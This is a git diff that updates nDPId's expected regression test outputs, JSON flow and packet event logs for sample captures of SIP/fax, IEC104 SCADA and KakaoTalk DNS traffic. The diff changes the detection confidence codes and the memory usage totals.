+00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7217,"source":"FAX-Call-t38-CA-TDM-SIP-FB-1.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":130,"flow_first_seen":1228468937630,"flow_last_seen":1228469046884,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":541,"flow_tot_l4_payload_len":18110,"flow_avg_l4_payload_len":139,"midstream":0,"thread_ts_msec":1228469046884,"l3_proto":"ip4","src_ip":"10.35.40.22","dst_ip":"10.23.1.42","src_port":2944,"dst_port":2944,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Megaco","breed":"Acceptable","category":"VoIP"}} +00708{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7217,"source":"FAX-Call-t38-CA-TDM-SIP-FB-1.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1228468958657,"flow_last_seen":1228469042442,"flow_idle_time":200000,"flow_min_l4_payload_len":297,"flow_max_l4_payload_len":884,"flow_tot_l4_payload_len":12177,"flow_avg_l4_payload_len":529,"midstream":0,"thread_ts_msec":1228469046884,"l3_proto":"ip4","src_ip":"138.132.169.101","dst_ip":"192.168.100.219","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7217,"source":"FAX-Call-t38-CA-TDM-SIP-FB-1.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":46,"flow_first_seen":1228468958651,"flow_last_seen":1228469042445,"flow_idle_time":200000,"flow_min_l4_payload_len":262,"flow_max_l4_payload_len":881,"flow_tot_l4_payload_len":24540,"flow_avg_l4_payload_len":533,"midstream":0,"thread_ts_msec":1228469046884,"l3_proto":"ip4","src_ip":"10.35.40.25","dst_ip":"10.35.40.200","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7217,"source":"FAX-Call-t38-CA-TDM-SIP-FB-1.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1228468958651,"flow_last_seen":1228469042444,"flow_idle_time":200000,"flow_min_l4_payload_len":262,"flow_max_l4_payload_len":881,"flow_tot_l4_payload_len":12270,"flow_avg_l4_payload_len":533,"midstream":0,"thread_ts_msec":1228469046884,"l3_proto":"ip4","src_ip":"10.35.60.72","dst_ip":"10.35.60.100","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} 00586{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":7217,"source":"FAX-Call-t38-CA-TDM-SIP-FB-1.pcap","alias":"nDPId-test","packets-captured":7217,"packets-processed":7217,"total-skipped-flows":0,"total-l4-payload-len":1167496,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":5,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":5,"total-idle-flows":5,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":33,"global_ts_msec":1228469046884} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 7217/7217 @@ -39,9 +39,9 @@ ~~ total active/idle flows...: 5/5 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 6082976 bytes -~~ total memory freed........: 6082976 bytes -~~ total allocations/frees...: 125347/125347 +~~ total memory allocated....: 6216610 bytes +~~ total memory freed........: 6216610 bytes +~~ total allocations/frees...: 128109/128109 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 484 chars ~~ json string max len.......: 1641 chars diff --git a/test/results/IEC104.pcap.out b/test/results/IEC104.pcap.out index e58a6bf3f..22f7c1098 100644 --- a/test/results/IEC104.pcap.out +++ b/test/results/IEC104.pcap.out @@ -5,13 +5,13 @@ 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"IEC104.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1317629088520,"flow_last_seen":1317629088520,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1317629088520,"l3_proto":"ip4","src_ip":"10.175.211.3","dst_ip":"10.119.105.26","src_port":2404,"dst_port":54769,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"IEC104.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1317629088520,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1317629088520,"pkt":"eCvLK7lWABIAxkrACABFAAAoSx9AAH0GYW0Kr9MDCndpGglk1fFZgPwe3z\/\/ZlAQ+y9PxQAAAAAAAAAA"} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"IEC104.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1317629088532,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"thread_ts_msec":1317629088532,"pkt":"eCvLK7lWABIAxkrACABFAAAuUsZAAH0GWcIKr9MBCndpGglk1fBIoLt3AFkTVVAY\/em9wgAAaAQBAEK5"} -00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"IEC104.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1317629088495,"flow_last_seen":1317629088532,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":3,"midstream":1,"thread_ts_msec":1317629088532,"l3_proto":"ip4","src_ip":"10.175.211.1","dst_ip":"10.119.105.26","src_port":2404,"dst_port":54768,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} +00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"IEC104.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1317629088495,"flow_last_seen":1317629088532,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":3,"midstream":1,"thread_ts_msec":1317629088532,"l3_proto":"ip4","src_ip":"10.175.211.1","dst_ip":"10.119.105.26","src_port":2404,"dst_port":54768,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"IEC104.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1317629088536,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"thread_ts_msec":1317629088536,"pkt":"eCvLK7lWABIAxkrACABFAAAuSyRAAH0GYWIKr9MDCndpGglk1fFZgPwe3z\/\/ZlAY+y+j+QAAaAQBAEK5"} -00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"IEC104.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1317629088520,"flow_last_seen":1317629088536,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":3,"midstream":1,"thread_ts_msec":1317629088536,"l3_proto":"ip4","src_ip":"10.175.211.3","dst_ip":"10.119.105.26","src_port":2404,"dst_port":54769,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} +00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"IEC104.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1317629088520,"flow_last_seen":1317629088536,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":3,"midstream":1,"thread_ts_msec":1317629088536,"l3_proto":"ip4","src_ip":"10.175.211.3","dst_ip":"10.119.105.26","src_port":2404,"dst_port":54769,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} 00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"IEC104.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1317629088731,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1317629088731,"pkt":"AAAMB6wBeCvLK7lWCABFAAAoJ9JAAIAGAAAKd2kaCq\/TAdXwCWQAWRNVSKC7fVAQAP5RXAAA"} 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"IEC104.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1317629088739,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1317629088739,"pkt":"AAAMB6wBeCvLK7lWCABFAAAoJ9tAAIAGAAAKd2kaCq\/TA9XxCWTfP\/9mWYD8JFAQAP5RXgAA"} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":15,"source":"IEC104.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1317629088495,"flow_last_seen":1317629090498,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":252,"flow_tot_l4_payload_len":603,"flow_avg_l4_payload_len":50,"midstream":1,"thread_ts_msec":1317629090498,"l3_proto":"ip4","src_ip":"10.175.211.1","dst_ip":"10.119.105.26","src_port":2404,"dst_port":54768,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} -00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":15,"source":"IEC104.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1317629088520,"flow_last_seen":1317629088739,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":2,"midstream":1,"thread_ts_msec":1317629090498,"l3_proto":"ip4","src_ip":"10.175.211.3","dst_ip":"10.119.105.26","src_port":2404,"dst_port":54769,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":15,"source":"IEC104.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1317629088495,"flow_last_seen":1317629090498,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":252,"flow_tot_l4_payload_len":603,"flow_avg_l4_payload_len":50,"midstream":1,"thread_ts_msec":1317629090498,"l3_proto":"ip4","src_ip":"10.175.211.1","dst_ip":"10.119.105.26","src_port":2404,"dst_port":54768,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} +00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":15,"source":"IEC104.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1317629088520,"flow_last_seen":1317629088739,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":2,"midstream":1,"thread_ts_msec":1317629090498,"l3_proto":"ip4","src_ip":"10.175.211.3","dst_ip":"10.119.105.26","src_port":2404,"dst_port":54769,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} 00554{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":15,"source":"IEC104.pcap","alias":"nDPId-test","packets-captured":15,"packets-processed":15,"total-skipped-flows":0,"total-l4-payload-len":609,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":15,"global_ts_msec":1317629090498} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 15/15 @@ -21,9 +21,9 @@ ~~ total active/idle flows...: 2/2 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5870938 bytes -~~ total memory freed........: 5870938 bytes -~~ total allocations/frees...: 118133/118133 +~~ total memory allocated....: 6004572 bytes +~~ total memory freed........: 6004572 bytes +~~ total allocations/frees...: 120895/120895 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 453 chars ~~ json string max len.......: 691 chars diff --git a/test/results/KakaoTalk_chat.pcap.out b/test/results/KakaoTalk_chat.pcap.out index b587d4564..b84544d10 100644 --- a/test/results/KakaoTalk_chat.pcap.out +++ b/test/results/KakaoTalk_chat.pcap.out @@ -2,64 +2,64 @@ 00554{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1430069021959} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069021959,"flow_last_seen":1430069021959,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1430069021959,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":38448,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1430069021959,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069021959,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADwAAEAAQBHSIAoYUrwKvAEBljAANQAogKaG7QEAAAEAAAAAAAAEYXV0aAVrYWthbwNjb20AAAEAAQ=="} -00776{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069021959,"flow_last_seen":1430069021959,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1430069021959,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":38448,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"auth.kakao.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00776{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069021959,"flow_last_seen":1430069021959,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1430069021959,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":38448,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"auth.kakao.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069022006,"flow_last_seen":1430069022006,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1430069022006,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":35603,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1430069022006,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":79,"pkt_l4_len":43,"thread_ts_msec":1430069022006,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAD8AAEAAQBHSHQoYUrwKvAEBixMANQArGNJpegEAAAEAAAAAAAAHYWMtdGFsawVrYWthbwNjb20AAAEAAQ=="} -00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069022006,"flow_last_seen":1430069022006,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1430069022006,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":35603,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"ac-talk.kakao.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069022006,"flow_last_seen":1430069022006,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1430069022006,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":35603,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"ac-talk.kakao.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069022007,"flow_last_seen":1430069022007,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1430069022007,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":57816,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1430069022007,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":78,"pkt_l4_len":42,"thread_ts_msec":1430069022007,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAD4AAEAAQBHSHgoYUrwKvAEB4dgANQAqGG9RAgEAAAEAAAAAAAAGa2F0YWxrBWtha2FvA2NvbQAAAQAB"} -00778{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069022007,"flow_last_seen":1430069022007,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1430069022007,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":57816,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"katalk.kakao.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00778{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069022007,"flow_last_seen":1430069022007,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1430069022007,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":57816,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"katalk.kakao.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00569{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1430069022041,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":136,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":136,"pkt_l4_len":100,"thread_ts_msec":1430069022041,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAAHgb0gAANREBEwq8AQEKGFK8ADWLEwBk4PlpeoGAAAEAAwAAAAAHYWMtdGFsawVrYWthbwNjb20AAAEAAcAMAAUAAQAABZUADQdhYy10YWxrAmdswBTALwABAAEAAACbAARuTI1wwC8AAQABAAAAmwAEAckAJw=="} -00795{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069022006,"flow_last_seen":1430069022041,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":92,"flow_tot_l4_payload_len":127,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1430069022041,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":35603,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"ac-talk.kakao.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"110.76.141.112"}} +00795{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069022006,"flow_last_seen":1430069022041,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":92,"flow_tot_l4_payload_len":127,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1430069022041,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":35603,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"ac-talk.kakao.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"110.76.141.112"}} 00537{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1430069022041,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":114,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":114,"pkt_l4_len":78,"thread_ts_msec":1430069022041,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAAGIb0wAANREBKAq8AQEKGFK8ADWWMABOrZ2G7YGAAAEAAgAAAAAEYXV0aAVrYWthbwNjb20AAAEAAcAMAAUAAQAABccACgRhdXRoAmdswBHALAABAAEAAABWAATSZ\/AP"} -00792{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":5,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069021959,"flow_last_seen":1430069022041,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1430069022041,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":38448,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"auth.kakao.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"210.103.240.15"}} +00792{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":5,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069021959,"flow_last_seen":1430069022041,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1430069022041,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":38448,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"auth.kakao.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"210.103.240.15"}} 